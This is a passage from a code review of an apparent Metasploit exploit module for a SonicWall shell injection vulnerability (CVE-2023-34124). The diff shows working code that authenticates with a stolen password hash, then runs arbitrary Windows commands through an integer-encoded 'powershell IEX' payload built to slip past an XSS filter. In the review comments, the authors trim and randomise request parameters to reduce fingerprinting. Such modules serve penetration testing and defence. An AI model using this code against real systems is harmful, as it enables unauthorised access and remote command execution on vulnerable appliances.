modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb

```diff
@@ -0,0 +1,380 @@
+
+    # Look for the getPwdHash function call, as it contains the token we need
+    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?
+      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')
+    end
+
+    server_token = ::Regexp.last_match(1)
+    vprint_status("Got the server-side token: #{server_token}")
+
+    # Generate the client_hash by combining the server token + the stolen
+    # password hash
+    client_hash = Digest::MD5.hexdigest(server_token + hash)
+    vprint_status("Generated client token: #{client_hash}")
+
+    # Send the token
+    print_status('Attempting to authenticate with the client token + password hash...')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'action' => 'login',
+        'skipSessionCheck' => '0',
+        'needPwdChange' => '0',
+        'clientHash' => client_hash,
+        'password' => hash,
+        'applianceUser' => username,
+        'appliancePassword' => 'Nice Try',
+        'ctlTimezoneOffset' => '0'
+      }
+    })
+
+    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
+
+    # Check the title to make sure it worked
+    html = res.get_html_document
+    title = html.at('title').text
+
+    # We can identify the platform based on the title
+    if title == TITLE_LINUX
+      print_good("Successfully logged in as #{username} (Linux detected!)")
+      return Msf::Module::Platform::Linux
+    elsif title == TITLE_WINDOWS
+      print_good("Successfully logged in as #{username} (Windows detected!)")
+      return Msf::Module::Platform::Windows
+    end
+
+    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")
+  end
+
+  def execute_command_windows(cmd)
+    vprint_status("Encoding (Windows) command: #{cmd}")
+
+    # While this is a shell command injection issue, an aggressive XSS filter
+    # prevents us from using a lot of important characters such as quotes and
+    # plus and ampersands and stuff. We can't even use Base64, because we can't
+    # use the + sign!
+    #
+    # We discovered that we could encode the command as integers, then use
+    # powershell to decode + execute it, so that's what this does.
+    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
+    cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"
+
+    # Run the command
+    vprint_status("Running shell command: #{cmd}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'num' => '3232150',
```

Comment:
What's this magic number?

Reply:
No idea, it's part of the request. It doesn't actually matter. I switched to `rand(1..999999)`.

Some of the parameters (`num`, `width`, and `criteria` for sure) don't actually matter. Any feelings on whether it's best to a) not send them, b) randomize them, or c) leave them on the defaults that the browser might send? I can see arguments for any of them, but randomizing reasonable values kinda seems best.

Reply:
In order of preferences:

1. Not send them: no need to increase payload size and fingerprinting opportunities.
2. Randomize them: reduce fingerprinting

Reply:
Cool! I removed everything I could, and got rid of some of the static stuff